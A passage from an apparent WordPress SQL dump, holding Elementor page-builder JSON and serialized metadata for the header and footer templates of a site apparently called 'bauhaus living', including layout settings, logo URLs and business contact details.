",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\"},\"elements\":[{\"id\":\"04f5e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":55,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"9976ebd\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":true},{\"id\":\"a3d2548\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.333,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"83a8e7e\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":true},{\"id\":\"42f189e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":40,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"dab1acf\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"hide_mobile\":\"hidden-mobile\",\"size_icon\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"74985dd\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"22c2d59\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#30302F\",\"padding\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"0135\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0141\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"90db396\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1b126a7\",\"elType\":\"widget\",\"settings\":{\"header_boxed_content\":\"\",\"cover_color\":\"#8F363600\",\"title_color\":\"#FFFFFF\",\"breadcrumbs_color\":\"#FFFFFF\",\"breadcrumbs_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_header_banner\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(4390,4944,'_elementor_page_assets','a:0:{}'),(4391,4944,'_elementor_pro_version','3.8.1'),(4396,4946,'_wp_page_template','default'),(4397,4946,'_elementor_edit_mode','builder'),(4398,4946,'_elementor_template_type','wp-post'),(4399,4946,'_elementor_version','3.6.6'),(4400,4946,'_elementor_data','[{\"id\":\"dc1de50\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"15\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"0183fbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"452409e\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Logo-white.png\",\"id\":10,\"alt\":\"logo-retirio\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"bc4c9cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"406f25a\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f7278e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"5a9b913\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"b8901ed\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(4401,4946,'_elementor_page_assets','a:0:{}'),(4402,4946,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4403,4947,'_wp_page_template','default'),(4404,4947,'_elementor_edit_mode','builder'),(4405,4947,'_elementor_template_type','wp-post'),(4406,4947,'_elementor_version','3.6.6'),(4407,4947,'_elementor_data','[{\"id\":\"dc1de50\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"35\",\"bottom\":\"22\",\"left\":\"40\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"15\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false},\"css_classes\":\"header_sticky mobile_sticky sticky_bg_dark\",\"z_index\":999,\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"1\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#E5E5E530\"},\"elements\":[{\"id\":\"0183fbf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":50,\"content_position\":\"center\",\"align\":\"flex-start\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"452409e\",\"elType\":\"widget\",\"settings\":{\"desk_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"desk_logo_size\":\"full\",\"desk_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"desk_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"mobile_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"mobile_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"mobile_logo_size\":\"full\",\"sticky_logo\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2022\\/06\\/bahaus_logo.png\",\"id\":4933,\"alt\":\"\",\"source\":\"library\"},\"sticky_w\":{\"unit\":\"px\",\"size\":157,\"sizes\":[]},\"sticky_h\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"sticky_logo_size\":\"full\",\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"ova_logo\"}],\"isInner\":false},{\"id\":\"bc4c9cc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":65.332,\"_inline_size_mobile\":5,\"content_position\":\"center\",\"align\":\"center\",\"_inline_size_tablet\":10},\"elements\":[{\"id\":\"406f25a\",\"elType\":\"widget\",\"settings\":{\"link_color\":\"#FFFFFF\",\"link_color_hover\":\"#E3B25A\",\"link_color_active\":\"#E3B25A\",\"submenu_link_color_hover\":\"#E3B25A\",\"submenu_link_color_active\":\"#E3B25A\",\"_element_width\":\"auto\",\"hide_tablet\":\"hidden-tablet\",\"hide_mobile\":\"hidden-mobile\",\"menu_slug\":\"primary\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"menu_typography_font_weight\":\"500\",\"menu_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false},\"menu_a_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_nav\"}],\"isInner\":false},{\"id\":\"f7278e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":17,\"_inline_size_mobile\":45,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":45},\"elements\":[{\"id\":\"5a9b913\",\"elType\":\"widget\",\"settings\":{\"_element_width\":\"auto\",\"size_icon\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_search_popup\"},{\"id\":\"b8901ed\",\"elType\":\"widget\",\"settings\":{\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"_element_width\":\"auto\",\"hide_desktop\":\"hidden-desktop\",\"menu_slug\":\"primary\",\"btn_color\":\"#FFFFFF\",\"text_color_hover\":\"#E3B25A\",\"text_color_active\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_canvas\"}],\"isInner\":false}],\"isInner\":false}]'),(4408,4947,'_elementor_page_assets','a:0:{}'),(4409,4947,'_elementor_css','a:6:{s:4:\"time\";i:1668396690;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4410,4492,'_elementor_pro_version','3.8.1'),(4411,4492,'_elementor_css','a:6:{s:4:\"time\";i:1695380554;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4412,4948,'_wp_page_template','default'),(4413,4948,'_elementor_edit_mode','builder'),(4414,4948,'_elementor_template_type','wp-post'),(4415,4948,'_elementor_version','3.8.1'),(4416,4948,'_elementor_data','[{\"id\":\"ef331a9\",\"elType\":\"section\",\"settings\":{\"structure\":\"32\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/lines.png\",\"id\":139,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"initial\",\"background_overlay_xpos\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_overlay_ypos\":{\"unit\":\"%\",\"size\":135,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":145,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-450,\"sizes\":[]},\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"auto\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.04,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_position_mobile\":\"initial\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"7d36326\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":58.992,\"content_position\":\"top\",\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"120\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"bce0c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Le\'t turn your ideas into reality\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6e5254c\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[mc4wp_form id=\\\"107\\\"]\",\"_css_classes\":\"mc4wp-style-1\"},\"elements\":[],\"widgetType\":\"shortcode\"},{\"id\":\"4631f27\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"layout\":\"full_width\",\"content_position\":\"middle\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"88bc706\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"626a216\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"021 22544768\",\"phone_address\":\"021 22544768\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"_element_width\":\"auto\",\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"0caec2f\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"email_label\":\"info@bauhausliving.com\",\"email_address\":\"info@bauhausliving.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\"}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#FFFFFF\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"info_typography_font_weight\":\"bold\",\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":true},{\"id\":\"d70c8a3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"flex-end\",\"_inline_size_tablet\":100,\"align_tablet\":\"flex-start\"},\"elements\":[{\"id\":\"d12cde8\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"_id\":\"96cddfe\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"},\"link\":{\"url\":\"https:\\/\\/www.instagram.com\\/bauhausliving\\/\",\"is_external\":\"true\",\"nofollow\":\"\",\"custom_attributes\":\"\"}}],\"shape\":\"circle\",\"icon_color\":\"custom\",\"icon_primary_color\":\"#1D1D1D\",\"icon_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"ova_social_icons_display\":\"inline-flex\",\"_element_width\":\"auto\",\"icon_padding\":{\"unit\":\"em\",\"size\":1,\"sizes\":[]},\"icon_spacing\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_element_vertical_align\":\"center\",\"hover_primary_color\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"social-icons\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"5931fd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":13.68,\"content_position\":\"top\",\"align\":\"flex-start\",\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"077\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"78\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02b9056\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9ce475a\",\"elType\":\"widget\",\"settings\":{\"menu_slug\":\"menu-explore\",\"menu_color_normal\":\"#808080\",\"text_typography_typography\":\"custom\",\"text_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"menu_color_hover\":\"#E3B25A\",\"sub_menu_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_menu_footer\"}],\"isInner\":false},{\"id\":\"18d6727\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":27.289,\"content_position\":\"top\",\"align\":\"flex-start\",\"background_background\":\"classic\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-footer-right.png\",\"id\":145,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"css_classes\":\"retirio_stretch_column_right\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.12,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"117\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":25,\"background_overlay_position_tablet\":\"initial\",\"background_overlay_xpos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_ypos_tablet\":{\"unit\":\"%\",\"size\":-150,\"sizes\":[]},\"background_overlay_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_overlay_size_tablet\":\"contain\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"77\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a3214d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6b9862e\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"\",\"items_info\":[{\"type\":\"link\",\"email_label\":\"needhelp@company.com\",\"email_address\":\"needhelp@company.com\",\"_id\":\"3710ec8\",\"phone_label\":\"+23 425 4466 80\",\"phone_address\":\"+23425446680\",\"link_label\":\"BAUHAUS LIVING. Jl. Jalur 20 blok 22 no. 17, Meruya Utara Kembangan, Jakarta Barat 11620\",\"link_address\":{\"url\":\"https:\\/\\/goo.gl\\/maps\\/aDtccje1G7M53R3E8\",\"is_external\":\"on\",\"nofollow\":false,\"custom_attributes\":\"\"}}],\"icon_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"info_color\":\"#808080\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"info_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"initial\",\"_element_custom_width\":{\"unit\":\"px\",\"size\":191},\"info_color_hover\":\"#E3B25A\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f3df713\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#1D1D1D\",\"padding\":{\"unit\":\"px\",\"top\":\"21\",\"right\":\"10\",\"bottom\":\"25\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"5aa0f63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ebc849a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2023 bauhaus living, develop by <a href=\\\"http:\\/\\/www.futuremediatrix.com\\\">futuremediatrix.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#808080\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(4417,4948,'_elementor_page_assets','a:0:{}'),(4418,4948,'_elementor_pro_version','3.8.1'),(4419,4948,'_elementor_css','a:6:{s:4:\"time\";i:1695373988;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:2;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4420,103,'_elementor_css','a:6:{s:4:\"time\";i:1695380730;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:2;s:9:\"fa-brands\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(4421,4933,'_edit_lock','1695601877:2'),(4423,4950,'_wp_attached_file','2023/09/1695601950-picsay.png'),(4424,4950,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:900;s:6:\"height\";i:900;s:4:\"file\";s:29:\"2023/09/1695601950-picsay.png\";s:8:\"filesize\";i:169178;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"1695601950-picsay-300x300.png\";s:5:\"width\";i:300;